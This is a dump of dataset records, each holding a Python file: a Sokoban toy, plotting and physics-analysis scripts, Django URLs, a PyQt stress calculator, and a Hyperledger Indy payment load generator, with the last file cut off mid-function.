AttributeError:\n logger.boot('warning: unable to parser the %s partno of the %s board: has no the method %s'\n %(partno,board_name,method_name))\n raise\n\n def _parse_chips(self, module):\n chipname = module['id']\n partno = module['partno']\n method_name = 'parse_' + partno.lower()\n\n try:\n XObject.get_classes()[partno].parse_chip_profile(module, self._base_board_name)\n except AttributeError:\n logger.boot('warning: unable to parser the %s partno of the %s chip: has no the method %s'\n 
%(partno,chipname,method_name))\n            raise\n\n    def _parse_eeprom(self, board_name, eeprom):\n        chip_id = eeprom['id']\n        eeprofile = Profile.get_eeprom()\n        eeprofile[chip_id] = dict()\n\n        for key, value in eeprom.iteritems():\n            eeprofile[chip_id][key] = copy.deepcopy(value)\n\n        eeprofile[chip_id]['bus'] = Profile.get_bus_path(eeprom['bus'])\n        eeprofile[chip_id]['addr'] = int(eeprom['addr'],16)\n\n    def _parse_digital_io(self, profile):\n        '''\n        {\n            \"gpio_id\":{\"type\":\"gpio\",\"path\":\"AXI4_GPIO_0\",\"ipcore\":\"Axi4Gpio\",\"gpio_number\":\"0\"},\n\n        }\n        '''\n\n        ioes = Profile.get_ioes()\n        digital_io_id = profile['id']\n        ioes[digital_io_id] = copy.deepcopy(profile)\n\n        ioes[digital_io_id].pop(\"id\")\n\n        if 'type' in profile.keys() and profile['type'] == 'gpio':\n            initconfig = Profile.get_initconfig()\n            initconfig['gpio'] = initconfig.setdefault('gpio', dict())\n            gpio_number = int(profile['gpio_number'])\n            dir_value = {'input': 1,'output': 0}\n            dire = (gpio_number,dir_value[ioes[digital_io_id].pop(\"dir\")])\n            initconfig['gpio'][digital_io_id]=dict(dir=dire)\n            if 'default' in profile.keys():\n                value = (gpio_number,int(ioes[digital_io_id].pop(\"default\")))\n                initconfig['gpio'][digital_io_id]['value'] = value\n\n","sub_path":"xavier_vendor/ee/profile/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"474050582","text":"'''\r\n    0.- player\r\n    1.- boxes\r\n    2.- goals\r\n    3.- walls\r\n    4.- corridor\r\n    5.- box/goal\r\n    6.- player/goal\r\n'''\r\nmapa=[[3, 3, 3, 3, 3],\r\n      [3, 4, 0, 4, 3],\r\n      [3, 1, 2, 4, 3], \r\n      [3, 3, 3, 3, 3]]\r\n\r\nposition_col= 3\r\nposition_row= 1\r\n\r\ndef printMapa():\r\n    for x in range(len(mapa)):\r\n        for y in range(len(mapa[x])):\r\n            print(mapa[x][y], end= \" \")\r\n        print()\r\nprintMapa()\r\nwhile True:\r\n    move=input('a_left, d_right')\r\n    # right\r\n    if move ==\"d\":\r\n        if mapa[position_row][position_col]==0 and mapa[position_row][position_col+1]==4:\r\n            mapa [position_row] [position_col]=4\r\n            mapa [position_row] [position_col +1]=0\r\n            position_col=position_col+1 \r\n    printMapa()","sub_path":"socoban5.py","file_name":"socoban5.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"368251546","text":"# plotting the data\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os, os.path\n\n\n\n# counting files in the renamed directory\nids = len(os.listdir('./results/sorted/'))\n\n\nn = 0\nparticipantid = []\n\nwhile n < ids:\n    n = n + 1\n    m = n + 10\n    participantid.append(m)\n\n# creating an index list for the videonames\n\n\nn = 1\nvideonumber = []\n\nwhile n <= 166:\n    videonumber.append(n)\n    n = n + 1\n\n\n# reading files into a list with index for histogram (sorted by index)\n\nfor f in participantid:\n\n    infile = open('./results/sorted/%s.txt' % f, 'r')\n\n    rating = []\n\n    for line in infile:\n\n        list1 = []\n        list1 = line.strip().split(',')\n        list1.pop(0)\n        value = int(list1[0])\n\n        rating.append(value)\n\n    numrow = len(participantid)\n    num = int(f) - 10\n\n\n    plt.figure(1)\n    plt.subplot(numrow, 1, num)\n    plt.plot(rating, 'bo')\n    plt.ylabel('rating')\n    plt.xlabel('video id')\n    plt.title(f)\n\nplt.show()\n\n\n\n# reading files into a list sorted by rating with 
index\n","sub_path":"histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"15211542","text":"import argparse\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument(\"year\" , help = \"choose among:2016,2017,2018\", default = '2018')\nargs = parser.parse_args()\nyear = args.year\n\nimport os, sys\nimport ROOT, math\nimport numpy as np\nimport pandas, root_numpy\nfrom ROOT import TLorentzVector\nfrom copy import deepcopy as dc\npandas.options.mode.chained_assignment = None # default='warn'\n\nmuonmass_ = 0.1056583745\nkaonmass_ = 0.493677\npionmass_ = 0.139570\nJPsiMass_ = 3.096916\n\nfrom PhysicsTools.HeppyCore.utils.deltar import deltaR\n\nsamples = [\n 'data',\n 'MC_LMNR', \n 'MC_JPSI', \n 'MC_PSI', \n# 'MC_BS', \n# 'MC_BSJPSIPHI', \n# 'MC_BSJPSIKST', \n# 'MC_HBJPSIX', # 2018\n\n ]\n\ntkp_lv = TLorentzVector()\ntkm_lv = TLorentzVector()\nmum_lv = TLorentzVector()\nmup_lv = TLorentzVector()\n\npion_lv = TLorentzVector()\nkaon_lv = TLorentzVector()\n\n\n@np.vectorize\ndef addDR(\n mumEta, mumPhi, \n tkpEta, tkpPhi\n ):\n \n if mumEta == -99:\n return -99 \n\n return deltaR(mumEta, mumPhi, tkpEta, tkpPhi )\n\n@np.vectorize\ndef addPsi2sMass(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi\n ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n tkp_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n tkm_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n\n opt1 = (mum_lv + mup_lv + tkp_lv + tkm_lv).M()\n return opt1\n\n@np.vectorize\ndef addpipiMass(\n tkmPt, tkmEta, tkmPhi, \n tkpPt, tkpEta, tkpPhi\n ):\n \n if tkmPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n tkp_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n\n opt1 = (mum_lv + tkp_lv ).M()\n return opt1\n\n\n@np.vectorize\ndef addpiKMass(\n mumPt, mumEta, mumPhi, \n tkpPt, tkpEta, tkpPhi\n ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, pionmass_)\n tkp_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n\n opt1 = (mum_lv + tkp_lv ).M()\n return opt1\n\n\n@np.vectorize\ndef addmmpi2(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n if tagB0 == 1:\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n else:\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n\n opt1 = (mum_lv + mup_lv + pion_lv ).M()\n opt2 = (mum_lv + mup_lv + kaon_lv ).M()\n return opt1, opt2\n\n\n@np.vectorize\ndef addmmpi2Paolo(\n mumuPt, mumuEta, mumuPhi, mumuMass, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n mum_lv.SetPtEtaPhiM(mumuPt, mumuEta, mumuPhi, mumuMass)\n if tagB0 == 1:\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n else:\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n\n opt1 = (mum_lv + pion_lv ).M()\n opt2 = (mum_lv + kaon_lv ).M()\n return opt1, opt2\n\n\n@np.vectorize\ndef 
addkstarmass(\n tkmPt, tkmEta, tkmPhi, \n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n \n if tagB0 == 1:\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n else:\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n\n opt1 = (kaon_lv + pion_lv ).M()\n return opt1\n\n@np.vectorize\ndef addbwtmass(\n mumuPt, mumuEta, mumuPhi, mumuMass, \n tkmPt, tkmEta, tkmPhi, \n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n \n mum_lv.SetPtEtaPhiM(mumuPt, mumuEta, mumuPhi, mumuMass)\n if tagB0 == 1:\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n else:\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n\n opt1 = (mum_lv + kaon_lv + pion_lv ).M()\n return opt1\n\n\n\n\ndef addmmpiKaon (row):\n if row['tagB0'] == 1 :\n return row['bBarMass']\n else: \n return row['bMass']\ndef addkst2 (row):\n if row['tagB0'] == 1 :\n return row['kstBarMass']\n else: \n return row['kstMass']\n\ndef addpi1Pt (row):\n if row['tagB0'] == 1 :\n return row['kstTrkpPt']\n else: \n return row['kstTrkmPt']\ndef addpi2Pt (row):\n if row['tagB0'] == 1 :\n return row['kstTrkmPt']\n else: \n return row['kstTrkpPt']\n\n\n\n@np.vectorize\ndef addmmkkmass(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n\n opt1 = (mum_lv + mup_lv + pion_lv + kaon_lv).M()\n return opt1\n\n\n@np.vectorize\ndef addmmpipimass(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n\n opt1 = (mum_lv + mup_lv + pion_lv + kaon_lv).M()\n return opt1\n\n\n@np.vectorize\ndef addxcut(wt_mass, wt_kstarmass, kaonPt, pionPt, mmpiMass, mmkMass):\n \n bool1 = ( (5.2791 - wt_mass) - 0.3 ) / (-0.1-0.3)< (((wt_kstarmass-0.896)--0.4) / (0.6--0.4))\n bool2 = kaonPt > pionPt\n bool3 = (wt_kstarmass-0.896)>0\n bool4 = (mmpiMass > 3.2) & (mmpiMass < 3.6)\n bool5 = (mmkMass > 4.7) & (mmkMass < 4.9)\n bool6 = ((mmkMass - 3.8) / (4.8 - 3.8)) > ((mmpiMass-3)/(3.6-3))\n \n xcut = bool1 & bool2 & bool3 & bool4 & bool5 & bool6\n return xcut\n\n\nfor str_file in samples:\n\n input_files = []\n print (str_file)\n\n for i in range(1):\n input_files = []\n input_files.append('../final_ntuples/%s%s_newphi_punzi_removeTkMu_fixBkg_B0Psicut_fixPres.root'%(args.year, str_file )) \n ofile = '../final_ntuples/%s%s_newphi_punzi_removeTkMu_fixBkg_B0Psicut_addxcutvariable.root'%(year, str_file)\n\n print ('loading ds...')\n ds = pandas.DataFrame(\n root_numpy.root2array(\n input_files,\n 'ntuple',\n# stop = 10000\n )\n )\n \n ds['wt_mass']= ds.apply (lambda row: addmmpiKaon(row), axis=1) \n\n ds['wt_kstarmass']= ds.apply (lambda row: addkst2(row), axis=1) \n \n ds['kaonPt'] = ds.apply (lambda row: addpi1Pt(row), axis=1)\n ds['pionPt'] = ds.apply (lambda row: addpi2Pt(row), axis=1)\n \n\n ds['mmpiMass'], ds['mmkMass'] = addmmpi2(\n 
ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n ds.tagB0\n )\n \n ds['mmkkMass']= addmmkkmass(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['mmpipiMass']= addmmpipimass(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['pipiMass']= addpipiMass(\n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['xcut'] = addxcut(ds.wt_mass, ds.wt_kstarmass, ds.kaonPt, ds.pionPt, ds.mmpiMass, ds.mmkMass )\n ds['xcut'] = ds['xcut'].astype(np.int32) \n ds['muptrkm_pik'] = addpiKMass(\n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n )\n ds['muptrkm_kp'] = addpiKMass(\n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.mupPt, ds.mupEta, ds.mupPhi, \n )\n ds['mumtrkp_pik'] = addpiKMass(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['mumtrkp_kpi'] = addpiKMass(\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n ds.mumPt, ds.mumEta, ds.mumPhi, \n )\n \n \n import root_pandas\n ds.to_root(ofile, key='ntuple')#, store_index=False)\n \n","sub_path":"bdt/addVarsData.py","file_name":"addVarsData.py","file_ext":"py","file_size_in_byte":10714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56810377","text":"a=eval(input(\"enter any number to print reverse\"))\nrev=0\nb=a\nwhile a!=0:\n n=a%10\n a=a//10\n rev=rev*10+n\n\nprint(f\"The reverse of entered number is {rev}\")\n\nif b==rev:\n print('palindrome')\nelse:\n print('not a palindrome')\n","sub_path":"python/projects/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"329442250","text":"from django.conf.urls import url, static\nfrom django.conf import settings\nfrom Blog import views\n\napp_name = 'Blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^home/', views.blog, name='blog'),\n url(r'^blog/(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^articleFile', views.arcticleFile, name='articleFile'),\n url(r'^register',views.register,name='register'),\n]\n","sub_path":"Blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"632983170","text":"from __future__ import division\n\nimport xlrd\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport ui_allowableStresses\n\nclass AllowableStresses(QDialog,ui_allowableStresses.Ui_Dialog):\n def __init__(self, parent=None):\n super(AllowableStresses,self).__init__(parent)\n self.setupUi(self)\n try:\n self.populateMatCombo()\n except:\n self.resultLabel.setText(\"Unable to open database file\")\n self.calculateButton.setDisabled(True)\n\n def populateMatCombo(self):\n self.wb = xlrd.open_workbook('Table-1A.xls')\n #self.resultLabel.setText(\"Unable to open database file\")\n self.sh = self.wb.sheet_by_index(0)\n numberOfRows=self.sh.nrows\n col = self.sh.col_values(6)\n self.matComboData=col[6:numberOfRows]\n self.materialCombo.clear()\n self.materialCombo.addItems(self.matComboData)\n\n def 
calculateStress(self, currentRow, temperature):\n        tempRange=[-30, 65, 100, 125, 150, 200, 250, 300, 325, 350, 375, 400, 425, 450, 475, 500, 525, 550, 575, 600, 625, 650, 675, 700, 725, 750, 775, 800, 825, 850, 875, 900]\n        currentMatRow=currentRow[20:52]\n        # find the first tabulated temperature at or above the requested one\n        for x2 in tempRange:\n            if x2 >= temperature:\n                i = list.index(tempRange, x2)\n                break\n        #print i, x2\n        x1 = tempRange[i-1]\n        y1 = currentMatRow[i-1]\n        if y1==\"\":\n            y1=0\n        y2 = currentMatRow[i]\n        if y2==\"\":\n            y2=0\n        #print tempRange\n        #print currentMatRow\n        #print i,x1,x2,y1,y2,len(tempRange), len(currentMatRow)\n        # linear interpolation between the two bracketing table entries\n        return (temperature - x1) * (y2 - y1) / (x2 - x1) + y1\n\n    @pyqtSlot()\n    def on_calculateButton_clicked(self):\n        try:\n            self.resultLabel.clear()\n            temperature=float(self.temperatureLineEdit.text())\n            matIndex=self.materialCombo.currentIndex()+6\n            matRow = self.sh.row_values(matIndex)\n            #print matIndex,temperature, matRow\n            stressValue=str(self.calculateStress(matRow,temperature))\n            self.resultLabel.setText(\"Allowable Stress Value @ \" +str(temperature)+ \" 'C = \"+ stressValue +\" MPa\")\n        except:\n            self.resultLabel.setText(\"Invalid Input\")\n\nif __name__==\"__main__\":\n    import sys\n    app=QApplication(sys.argv)\n    form=AllowableStresses()\n    form.show()\n    app.exec_()","sub_path":"Python/AllowableStresses/allowablestressesdlg.pyw","file_name":"allowablestressesdlg.pyw","file_ext":"pyw","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"281206780","text":"# report statistics\n\nfrom backup.case6 import *\nfrom htmlreporter import HtmlReport\nimport configparser\nfrom runners import runner3\nfrom globalpkg.global_var import *\nfrom runners import pc_login\ntestsuitex = []\ntestsuitrul = []\n\ncookies = pc_login.cookies\n\n# record the test start time\nstart_time = datetime.datetime.now()\n\n# run the tests\n# PC - void a reservation DONE\nrunner3.runcase(testsuit6,cookies)\n#runner1.runcase(testsuit5,cookies)\n#runner1.runcase(testsuit9,cookies)\n#mobile\n#runner2.runcase(testsuitm)\n# suites 4 and 6\n# 3: void a job reservation\n# 5: edit, copy and delete a job reservation; affects the main-line result\n# 6-: edit a safety analysis, withdraw it, resubmit after withdrawal, full flow\n# 7: edit and delete a safety analysis\n# 8-: edit a safety analysis, withdraw, resubmit after withdrawal, full flow; also withdraw/resubmit for job tasks and for work permits\n# 9: delete a job task\n# runner1.runcase(testsuit3,cookies)\n# runner1.runcase(testsuit5,cookies)\n# runner1.runcase(testsuit6,cookies)\n# runner1.runcase(testsuit7,cookies)\n# runner1.runcase(testsuit8,cookies)\n# runner1.runcase(testsuit9,cookies)\n# record the test end time\nend_time = datetime.datetime.now()\n# build the test report\nreport_title = 'ushayden_interface_autotest_report(%s)'%case\nhtml_report = HtmlReport('test report', report_title)\nhtml_report.set_time_took(str(end_time - start_time))  # compute the elapsed test time\n\n# read the report directory and file name\nconfig = configparser.ConfigParser()\nconfig.read('./config/report.conf', encoding='utf-8')\ndir_of_report = config['REPORT']['dir_of_report']\nreport_name = config['REPORT']['report_name']\n\n# set the report output directory\nhtml_report.mkdir_of_report(dir_of_report)\n\n# generate the test report\nhtml_report.generate_html(report_name)\n\nlogger.info('test report generated successfully')\n\n# mymail = MyMail('./config/mail.conf')\n# mymail.connect()\n# mymail.login()\n# mail_content = 'Hi, the interface test report is attached, please review'\n# mail_title = '[Test Report] interface test report ' + str(executed_history_id)\n# logger.info(html_report.get_filename())\n# attachments = set([html_report.get_filename()])\n#\n# logger.info('sending the test report email...')\n# mymail.send_mail(mail_title, mail_content, attachments)\n# mymail.quit()\n#\n# logger.info('email sent successfully')\n# 
logger.info(\"-------------------------------------THE_END----------------------------------------------------------------------\")","sub_path":"useless/s6.py","file_name":"s6.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"411479158","text":"from abc import ABCMeta\nimport json\nfrom collections import deque\nfrom ctypes import CDLL\nfrom datetime import datetime\nimport random\n\nfrom indy import payment\nfrom indy import did, ledger\n\nfrom perf_load.perf_utils import ensure_is_reply, divide_sequence_into_chunks\nfrom perf_load.perf_req_gen import NoReqDataAvailableException, RequestGenerator\n\n\nclass RGBasePayment(RequestGenerator, metaclass=ABCMeta):\n TRUSTEE_ROLE_CODE = \"0\"\n\n DEFAULT_PAYMENT_ADDRS_COUNT = 100\n\n NUMBER_OF_TRUSTEES_FOR_MINT = 4\n MINT_RECIPIENTS_LIMIT = 100\n AMOUNT_LIMIT = 100\n\n __initiated_plugins = set()\n\n @staticmethod\n def __init_plugin_once(plugin_lib_name, init_func_name):\n if (plugin_lib_name, init_func_name) not in RGBasePayment.__initiated_plugins:\n try:\n plugin_lib = CDLL(plugin_lib_name)\n init_func = getattr(plugin_lib, init_func_name)\n res = init_func()\n if res != 0:\n raise RuntimeError(\n \"Initialization function returned result code {}\".format(res))\n RGBasePayment.__initiated_plugins.add((plugin_lib_name, init_func_name))\n except Exception as ex:\n print(\"Payment plugin initialization failed: {}\".format(repr(ex)))\n raise ex\n\n def __init__(self, *args,\n payment_method,\n plugin_lib,\n plugin_init_func,\n payment_addrs_count=DEFAULT_PAYMENT_ADDRS_COUNT,\n **kwargs):\n\n super().__init__(*args, **kwargs)\n\n RGBasePayment.__init_plugin_once(plugin_lib,\n plugin_init_func)\n\n self._pool_handle = None\n self._wallet_handle = None\n self._submitter_did = None\n\n self._payment_method = payment_method\n self._payment_addrs_count = payment_addrs_count\n self._payment_addresses = []\n self._additional_trustees_dids = []\n\n async def on_pool_create(self, pool_handle, wallet_handle, submitter_did, *args, **kwargs):\n await super().on_pool_create(pool_handle, wallet_handle, submitter_did, *args, **kwargs)\n\n self._pool_handle = pool_handle\n self._wallet_handle = wallet_handle\n self._submitter_did = submitter_did\n\n await self.__ensure_submitter_is_trustee()\n\n self._additional_trustees_dids = await self.__create_additional_trustees()\n\n await self.__create_payment_addresses()\n\n for payment_addrs_chunk in divide_sequence_into_chunks(self._payment_addresses,\n RGBasePayment.MINT_RECIPIENTS_LIMIT):\n await self.__mint_sources(payment_addrs_chunk, [self._submitter_did, *self._additional_trustees_dids])\n\n async def __ensure_submitter_is_trustee(self):\n get_nym_req = await ledger.build_get_nym_request(self._submitter_did, self._submitter_did)\n get_nym_resp = await ledger.sign_and_submit_request(self._pool_handle,\n self._wallet_handle,\n self._submitter_did,\n get_nym_req)\n get_nym_resp_obj = json.loads(get_nym_resp)\n ensure_is_reply(get_nym_resp_obj)\n res_data = json.loads(get_nym_resp_obj[\"result\"][\"data\"])\n if res_data[\"role\"] != RGBasePayment.TRUSTEE_ROLE_CODE:\n raise Exception(\"Submitter role must be TRUSTEE since \"\n \"submitter have to create additional trustees to mint sources.\")\n\n async def __create_additional_trustees(self):\n trustee_dids = []\n\n for i in range(RGBasePayment.NUMBER_OF_TRUSTEES_FOR_MINT - 1):\n tr_seed = \"Trustee{}\".format(2 + i)\n tr_seed = \"{}{}\".format(tr_seed, \"0\" * (32 - 
len(tr_seed)))\n tr_did, tr_verkey = await did.create_and_store_my_did(self._wallet_handle, json.dumps({'seed': tr_seed}))\n\n nym_req = await ledger.build_nym_request(self._submitter_did, tr_did, tr_verkey, None, \"TRUSTEE\")\n await ledger.sign_and_submit_request(self._pool_handle, self._wallet_handle, self._submitter_did, nym_req)\n\n # nym_resp = await ledger.sign_and_submit_request(self._pool_handle, self._wallet_handle, self._submitter_did, nym_req)\n # ensure_is_reply(nym_resp)\n\n trustee_dids.append(tr_did)\n\n return trustee_dids\n\n async def __create_payment_addresses(self):\n for i in range(self._payment_addrs_count):\n self._payment_addresses.append(\n await payment.create_payment_address(self._wallet_handle, self._payment_method, \"{}\"))\n\n async def __mint_sources(self, payment_addresses, trustees_dids):\n outputs = []\n for payment_address in payment_addresses:\n outputs.append({\"recipient\": payment_address, \"amount\": random.randint(1, RGBasePayment.AMOUNT_LIMIT)})\n\n mint_req, _ = await payment.build_mint_req(self._wallet_handle,\n self._submitter_did,\n json.dumps(outputs),\n None)\n\n for trustee_did in trustees_dids:\n mint_req = await ledger.multi_sign_request(self._wallet_handle, trustee_did, mint_req)\n\n mint_resp = await ledger.submit_request(self._pool_handle, mint_req)\n ensure_is_reply(mint_resp)\n\n async def _get_payment_sources(self, payment_address):\n get_payment_sources_req, _ = \\\n await payment.build_get_payment_sources_request(self._wallet_handle,\n self._submitter_did,\n payment_address)\n get_payment_sources_resp = \\\n await ledger.sign_and_submit_request(self._pool_handle,\n self._wallet_handle,\n self._submitter_did,\n get_payment_sources_req)\n ensure_is_reply(get_payment_sources_resp)\n\n source_infos_json = \\\n await payment.parse_get_payment_sources_response(self._payment_method,\n get_payment_sources_resp)\n source_infos = json.loads(source_infos_json)\n payment_sources = []\n for source_info in source_infos:\n payment_sources.append((source_info[\"source\"], source_info[\"amount\"]))\n return payment_sources\n\n\nclass RGGetPaymentSources(RGBasePayment):\n def _gen_req_data(self):\n return (datetime.now().isoformat(), random.choice(self._payment_addresses))\n\n async def _gen_req(self, submit_did, req_data):\n _, payment_address = req_data\n req, _ = await payment.build_get_payment_sources_request(self._wallet_handle,\n self._submitter_did,\n payment_address)\n return req\n\n\nclass RGPayment(RGBasePayment):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._sources_amounts = deque()\n self.__req_id_to_source_amount = {}\n self._old_reqs = set()\n\n async def on_pool_create(self, pool_handle, wallet_handle, submitter_did, *args, **kwargs):\n await super().on_pool_create(pool_handle, wallet_handle, submitter_did, *args, **kwargs)\n await self.__retrieve_minted_sources()\n\n async def __retrieve_minted_sources(self):\n for payment_address in self._payment_addresses:\n self._sources_amounts.extend(await self._get_payment_sources(payment_address))\n\n def _gen_req_data(self):\n if len(self._sources_amounts) == 0:\n raise NoReqDataAvailableException()\n\n source, amount = self._sources_amounts.popleft()\n address = random.choice(self._payment_addresses)\n\n inputs = [source]\n outputs = [{\"recipient\": address, \"amount\": amount}]\n\n return inputs, outputs\n\n async def _gen_req(self, submit_did, req_data):\n inputs, outputs = req_data\n req, _ = await payment.build_payment_req(self._wallet_handle,\n 
self._submitter_did,\n json.dumps(inputs),\n json.dumps(outputs),\n None)\n\n req_obj = json.loads(req)\n req_id = req_obj[\"reqId\"]\n source = inputs[0]\n amount = outputs[0][\"amount\"]\n self.__req_id_to_source_amount[req_id] = source, amount\n\n self._old_reqs.add(req_id)\n\n return req\n\n async def on_request_replied(self, req_data, req, resp_or_exp):\n req_obj = json.loads(req)\n req_id = req_obj.get(\"reqId\", None)\n if req_id not in self._old_reqs:\n return\n self._old_reqs.remove(req_id)\n\n if isinstance(resp_or_exp, Exception):\n return\n\n resp = resp_or_exp\n\n try:\n source, amount = self.__req_id_to_source_amount.pop(req_id)\n\n resp_obj = json.loads(resp)\n\n if \"op\" not in resp_obj:\n raise Exception(\"Response does not contain op field.\")\n\n if resp_obj[\"op\"] == \"REQNACK\" or resp_obj[\"op\"] == \"REJECT\":\n self._sources_amounts.append((source, amount))\n elif resp_obj[\"op\"] == \"REPLY\":\n receipt_infos_json = await payment.parse_payment_response(self._payment_method, resp)\n receipt_infos = json.loads(receipt_infos_json)\n receipt_info = receipt_infos[0]\n self._sources_amounts.append((receipt_info[\"receipt\"], receipt_info[\"amount\"]))\n\n except Exception as e:\n print(\"Error on payment txn postprocessing: {}\".format(e))\n\n\nclass RGVerifyPayment(RGBasePayment):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._sources_amounts = []\n self._receipts = []\n\n async def on_pool_create(self, pool_handle, wallet_handle, submitter_did, *args, **kwargs):\n await super().on_pool_create(pool_handle, wallet_handle, submitter_did, *args, **kwargs)\n await self.__retrieve_minted_sources()\n await self.__perform_payments()\n\n async def 